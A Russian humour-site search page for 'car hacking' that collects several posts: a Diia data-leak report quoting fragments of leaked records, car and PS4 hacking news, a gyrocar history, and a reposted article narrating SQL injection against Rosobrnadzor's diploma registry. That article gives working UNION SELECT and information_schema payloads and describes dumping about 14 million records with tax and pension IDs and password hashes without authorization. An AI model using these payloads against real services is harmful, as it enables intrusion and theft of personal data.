Результаты поиска по запросу «

взлом автомобиля

»

взлом (193)

-вЗЛОм (4)

взлом? (2)

автомобиля (5)

для автомобиля (2)

автомобиль? (1)

автомобилей (1)

автомобиль. (1)

а-а-автомобиль (1)

Взлом твиттера (10)


Запрос:
Создатель поста:
Теги (через запятую):



vivisectorvivisector

хакеры взлом Дія Зеленский Минцифры Украина 

Дию ломанули (опять)

Пока мы спали, на RaidForums віложили 20 ГБ архив данных, спизженных через Дию.

Sean Brian Townsend 9h • 0 Мне кажется, или пора начинать беспокоиться? (Шесть часов назад неизвестные выложили на Яак^огитз данные из (предположительно) Дии, которая (предположительно) ничего не хранит. Около двадцати гигабайт архивов. В качестве ‘образца*) Хотелось бы услышать какой-нибудь

Например, потекли ЕЦП, ковид сертификаты, и бог знает что еще - архив выложили не полный, только демо часть. Обычно в таких случаях самое вкусное достается покупателю. Данные относительно свежие, и судя по всему актуальные.

eds 2021-10-24 10:33:16.947596+00 2021-10-27 14:39:35.184+00 536+00 2021-10-03 17:42:03.209+00 2698614498 individual eds 2021-10-03 17:42:12.553517+00 2021-10-03 18:10:28.058+00 eds 2021-11-03 21:25:19.876908+00 2021-11-04 15 :44:54.296+00 \N ШВИоД|е|ЦД[о11ШШ01ЖДДИ0Д13:55:49.16+00 -04

*.$......0..Mi. *.H.* .....MY. . .M0PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiIHN0YW5kYWxvbmU9InllcyI/Pj xBU2lDTWFuaWZlc3Q+PFNpZlJlZmVyZW5j ZSBVUkk9IklFVEEtSU . .*.$.......O.nlkOi. .U. .ЬАКЦЮНЕРНЕ ТОВАРИСТВО КОМЕРЦ1ЙНИЙ БАНК «ПРИВАТБАНК»1.0...U______АЦСК1402..U...+АЦСК АТ КБ

Если у кого есть ЕЦП, самое время его перевыпустить на всякий пожарный. Ну и телефоны мейлы итп перепривязать не мешало бы - никто не знает, что там еще утекло в каком количестве, и чем закончится. Завершим пост цитатой великих.

"Я думаю, що роль юбербезпеки трохи перебтьшена. Про не)' багато говорить, але по факту назвати яккь реальн) кейси юберзагроз мало хто може." МЫктр цифровоГ трансформацп Михайло Федоров М1жстерстоо цифровоТ трансформац(Т УкраТни,хакеры,взлом,Дія,Зеленский,Владимир Зеленский, Володимир

Развернуть
Комментарии 14222.01.202212:43ссылка24.5
MeffolMeffol

автомобиль mercedes это точно не панорама 

Mercedes-Benz анонсировали подписку на разгон

Comfort Acceleration Increase me connect service COMING SOON - Accelerate more powerfully: increase the torque and maximum output of your Mercedes-EQ. Unleash enhanced performance for your car Noticeable improvement in acceleration of 0.8 to 1.0 seconds (0-60 Adjustment of the motor

Крупный автоконцерн анонсировал подписку на разгон авто - услуга Acceleration Increase.

Автопроизводитель пишет, что новая услуга «повысит производительность вашего автомобиля» и даст ему «заметное улучшение ускорения». Он сделает это, отрегулировав «характеристику двигателя, крутящий момент и максимальную мощность».

Mercedes добавляет, что точная настройка электродвигателей позволяет увеличить максимальную мощность двигателя автомобиля Mercedes EQ на 20–24%, в зависимости от исходной мощности.

Цена - 1200 долларов в год и это даст возможность разгоняться до 60 миль в час (~96 км/ч) за 5,1 секунды вместо 6,0
Развернуть

Отличный комментарий!

Щас nvidia такая
RaMON_agent RaMON_agent24.11.202208:21ссылка
+31.8
Комментарии 9524.11.202208:18ссылка26.4
Master4eg123Master4eg123

geek взлом Black Hat песочница 

Взлом автомобилей по WiFi

На конференции Black Hat австралийский хакер Сильвио Сезаре (Silvio Cesare) выступил с докладом о том, как можно взламывать современные автомобили, которые работают по беспроводной связи. В данном случае уязвимое место — это ключ WiFi.

По словам Сильвио Сезаре, для взлома нужно приобрести оборудование стоимостью чуть больше $1000. Имея такое оснащение, злоумышленник может блокировать или разблокировать машину в любой момент. Он использовал программное радио (software-defined radio), чтобы генерировать сигнал на нужной частоте.

Сильвио Сезаре не сообщает, на каких конкретно моделях автомобилей он проводил эксперименты. Тем не менее, известно, что это довольно популярные модели, и сейчас Сильвио сотрудничает с австралийским подразделением Computer Emergency Response Team (CERT), чтобы устранить упомянутые недочёты.


geek,Прикольные гаджеты. Научный, инженерный и айтишный юмор,взлом,Black Hat,песочница
Развернуть
Комментарии 1105.08.201409:49ссылка1.0
wfrush wfrush

реклама взлом машина 

Такую вот рекламу мужик обнаружил.... ПОД лобовым стеклом своего автомобиля

реклама,рекламные фото приколы ,взлом,машина
Развернуть
Комментарии 29 17.09.201400:47 ссылка 30.8
sl33pyl1nxsl33pyl1nx

консоли ps4 взлом новости ядро 

Получен доступ к системному ядру PS4

егодня испанский разработчик JaiCraB совершил очень важный прорыв для возможного jailbreak всеми нами обожаемой PlayStation 4.

Как утверждает разработчик, он сумел подключиться к материнской плате ps4, нашел особые порты которые дают доступ к оперативной памяти консоли, а так же эти порты дают полный доступ к основному системному ядру системы (аналог SYSCON ядра на PS3) и через это ядро при помощи специальных плат Teensy++ 2.0 и RaspberryPi, а так же при помощи им же написанной утилиты JaiBrute сумел расшифровать различные системные команды системного PS4 ядра, и самое важное, у него есть возможность эти команды изменять и добавлять свои.

При этом для знающих людей он объяснил весь процесс, на фото показал схемы подключения, а так же выложил в общий доступ необходимые утилиты.
Данный прорыв открывает более интересные перспективы взлома PS4 нежели недавно найденная уязвимость сложного копирования PSN контента.

Источник с подробностями и объяснениями
http://www.ps4news.com/ps4-hacks-jailbreak/ps4-dumping-handling-memory-without-desoldering-by-jaicrab/
http://www.ps4news.com/ps4-hacks-jailbreak/ps4-uart-ports-on-playstation-4-saa-001-board-jaibrute-v1-by-jaicrab/
консоли,ps4,взлом,новости,ядро
Развернуть
Комментарии 11424.06.201516:33ссылка8.4
Good_ManGood_Man

взлом информационная безопасность sql длиннопост geektimes habrahabr текст много букв СНИЛС дыра ...story PostgreSQL obrnadzor инн рособрнадзор 

"И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках"

"https://habrahabr.ru/post/347760/"


Одиноким вечером, глядя на свою пустую зачётку и осознавая, что конец близок, я снова задумался о том, как бы мне сейчас собрать сумку, или даже просто рюкзак, положить туда рубашку, шорты и свалить в тёплую страну. Было бы хорошо, да вот с дипломом живётся намного лучше. Во всяком случае, мне всегда так говорят.

Также часто слышал много историй про людей, которые приходили на собеседования с красными дипломами МГУ, но при этом абсолютно не разбирались в своей специальности, а потом на корпоративах признавались, что диплом у них купленный.

Но времена сейчас другие, сейчас 21 век, век больших возможностей, любой работодатель, который умеет пользоваться мышкой и знает, как выглядит браузер на рабочем столе, может проверить данные диплома. Каждый диплом, который выдаётся учебным заведением, теперь регистрируется в едином реестре, доступ к которому есть у каждого через сайт Федеральной службы по надзору в сфере образования и науки.


ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ ОБРАЗОВАНИЯ И НАУКИ РОСОБРНАДЗОР,взлом,информационная безопасность,sql,PostgreSQL,длиннопост,geektimes,habrahabr,текст,Истории,obrnadzor,много букв,рособрнадзор,СНИЛС,инн,дыра



Для получение информации о документе об образовании достаточно просто заполнить форму, передвинуть слайдер и нажать кнопку. Вам либо покажут информацию о документе, либо скажут, что такого нет (но ещё рано обвинять соискателя в обмане, мало ли, что могло произойти).


Для поиска введите точные значения реквизитов, указанные на бланке документа: Более подробно о работе с данным сервисом можно ознакомиться по ссылке Уровень образования Не выбрано Уровна* обрио Наименование 00: Фамилия обладателя документа: Серия бланка: Номер бланка Дата выдачи: О Найти 00



Ну и пока я смотрел на эту форму, решил я с ней поиграться. Повводил всякой чепухи, и бац — на поле, в которое было введено 1', я получаю такой response:

<h2>Произошла ошибка</h2><p>SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "4"LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U... ^</p>


Голый SQL Injection. Очевидно, что задачи продумать обработку ошибок перед разработчиком не было. Задача была сделать сервис, который работает. Сервис, который является гарантом. Так одинокий вечер превратился в весёлую одинокую ночь.


Ещё будучи подростком я очень любил всякие крутые истории про хакеров, а после того, как решил заняться программированием, изредка почитывал и интересные статьи по взлому и прочему. Так что то, что нужно делать дальше — я знал.

Так как разработчик этого сервиса дал нам удовольствие видеть ещё и часть запроса, то мы можем с уверенностью предположить, что это SELECT запрос. Теперь нам нужно как-то обнулить действие запроса, записанного в php-скрипте, а потом с помощью переменной вставить свой.

Для обнуления запроса достаточно просто добавить невозможное условие и закомментировать последующие строки запроса, что-то наподобие:

Инъекция

...me) = UPPER('1') AND (1=0)) — ')) AND (doc.education_level_id = '4') AND (U…


В ответ просто пришло сообщение о том, что документ не найден.

Также пробовал использовать вместо невозможного условия, наоборот, очевидные. А именно пробовал искать какой-либо документ по id. Писал id=1, id=1024 и прочее, но результатов не дало. Видимо, id давно перевалило за тысячи (спойлер: за миллионы).

Также я совершенно не надеялся на то, что запрос придёт без ошибки. Я был уверен, что пробелы будут экранироваться, удаляться, запрещаться, ещё что-нибудь. Ведь в форме на странице поиска ввести фамилию с пробелами невозможно. Но всё оказалось в разы проще.

Ну а теперь бы хотелось вытащить что-то действительно интересное. Изменить структуру ответа мы не можем никак, то есть если в запросе были, например, SELECT id, name, count, то так оно и останется. Значит надо подстраиваться, а для начала понять, какие же данные запрашиваются из БД, и, главное, сколько? Существует много способов узнать количество полей, но мне помог только ORDER BY. Как это работает?

ORDER BY сделан для сортировки, но его синтаксис не требует обязательно указывать имя поля, достаточно указать его позицию в запросе. Если указать номер позиции больше, чем количество запрашиваемых полей — то будет ошибка. Методом перебора можно подобрать количество полей. Их оказалось 55.

Хочется понять, с чем же мы работаем, что это за база данных такая? Предположим, что это MySQL, в MySQL есть функция Version(), которая возвращает версию БД. Применим:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,version(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…


В ответ пришёл JSON, в котором было:
PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit
Отлично, мы знаем систему, версию БД (под неё вроде даже эксплоиты были). Поле для действия расширилось. Узнаём, как выглядит запрос:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,current_query(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…


Ответ:
"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

Вся картина перед нами.

Попробуем узнать, что же за таблицы есть во всей базе данных:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,table_name,тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.tables — ')) AND (doc.education_level_id = '4') AND (U…


Таким образом получили все таблицы. Узнаём столбцы каждой таблицы следующим образом:

Инъекция

...me) = UPPER('1') AND (1=0)) UNION SELECT 1,CONCAT(column_name,' ',data_type,' ',is_nullable),тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.columns WHERE table_name='Какое-то имя таблицы' — ')) AND (doc.education_level_id = '4') AND (U…


Итак, зная структуру базы данных, я написал скрипт на Питон и выкачал все самые интересные на мой взгляд данные. А именно:

Таблицу с дипломами об образовании (серия, номер, год поступления, год окончания, СНИЛС!, ИНН!!, серия и номер паспорта (честно говоря, у всех записей поля пустые, но сам факт!), дата рождения, национальность (зачем?), учебная организация, выдавшая документ), таблицу с гражданами с образованием (там всё проще: ФИО и всё), таблицу с пользователями системы (стандартно, логин, email, и, НЕОЖИДАНО, md5 хэш пароля, хоть не сам пароль), отдельная таблица admin с одной записью (так же: логин, хэш пароля и прочее), таблица с информацией об учебных заведениях (кто начальник, email, телефон, лицензия — в общем всё, что и так есть в открытом доступе) и ещё кучу вспомогательных таблиц.

По объёмам получилось: около 14 000 000 документов об образовании, около 14 000 000 записей с данными о бывших студентах, 1322 пользователя системы, 1 админ, который логинится по будням в системе, видимо, когда на работу приходит, 3391 учебное заведение и горы непонятной информации типа ОКОГУ и прочее. База весом 5 гб.

А теперь представьте, сколько времени это качалось. Вы думаете, кто-то заметил? Может быть сервис резко отключился, ip заблокировали или ещё что-то? НЕТ!

Конечно, целью не является использовать эту информацию в корыстных целях (да я и не представляю, как). Иначе бы я не писал статью здесь. Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием, хватило истории про Микротех.

Дополнительно решил проверить хэши по радужным таблицам. Не уверен, конечно, что они хэшировались именно голым md5, но, во всяком случае, в открытых базах данных совпадений ни к одному хэшу не нашлось. Или я что-то не умею.

Мог бы я продолжить и получить доступ в систему? Смог бы я сам изменять записи и добавлять свои? Вполне возможно, но я решил этого не делать. Да и сессию надо закрывать, без диплома-то никак…


Развернуть
Комментарии 3129.01.201814:18ссылка49.1
St.PSt.P

старые фото автомобиль 

Гирокар — гиростабилизированный двухколёсный автомобиль.

Двухколесный автомобиль системы П. Шиловскаго на улицахъ Лондона.,старые фото,автомобиль

В мае 1914 года на улицах Лондона Пётр Петрович Шиловский продемонстрировал действующую модель гиростабилизированного автомобиля. После начала Первой мировой войны эта машина была законсервирована, но отреставрирована в 1938 году. В 1948 году гирокар был пущен на слом создавшей его компанией «Уулзли» (Wolseley). 

Эта машина держалась в состоянии равновесия благодаря гироскопическому эффекту, произведенному тяжелым 600-килограммовым маховиком. Маховик был диском с диаметром в 1 метр и имел толщину 12 сантиметров. Чтобы его раскрутить, требовался 110-вольтный электромотор мощностью около 1,25 л. с. и питаемый динамо-машиной, которая была подключена к двигателю машины. Также использовались два 50-килограммовых «маятника».

В результате такая довольно примитивная гиростабилизация удерживала машину весом 2750 килограмм в вертикальном положении, по крайней мере до тех пор, пока водитель не пытался делать крутых поворотов.


Развернуть
Комментарии 3017.01.201914:59ссылка33.2
WilleniumWillenium

гифки взлом песочница 

ссылка на гифкугиф анимация,гифки - ПРИКОЛЬНЫЕ gif анимашки,взлом,песочница
Развернуть
Комментарии 316.05.201313:45ссылка1.7
JurashzJurashz

фото ПДД автомобиль 

Вакуумный блокировщик обзора на лобовое стекло, разблокировать можно только оплатив штраф, ну или сменив лобовое стекло

фото,ПДД,автомобиль

Развернуть

Отличный комментарий!

kinopoisk.ru
grimone grimone28.08.201818:50ссылка
+103.4
Комментарии 14128.08.201818:49ссылка89.3
poworot-777poworot-777

гифки автомобиль лайфхак 

ссылка на гифкугиф анимация,гифки - ПРИКОЛЬНЫЕ gif анимашки,автомобиль,лайфхак
Развернуть
Комментарии 503.10.201822:18ссылка-1.4
В этом разделе мы собираем самые смешные приколы (комиксы и картинки) по теме взлом автомобиля (+1000 картинок)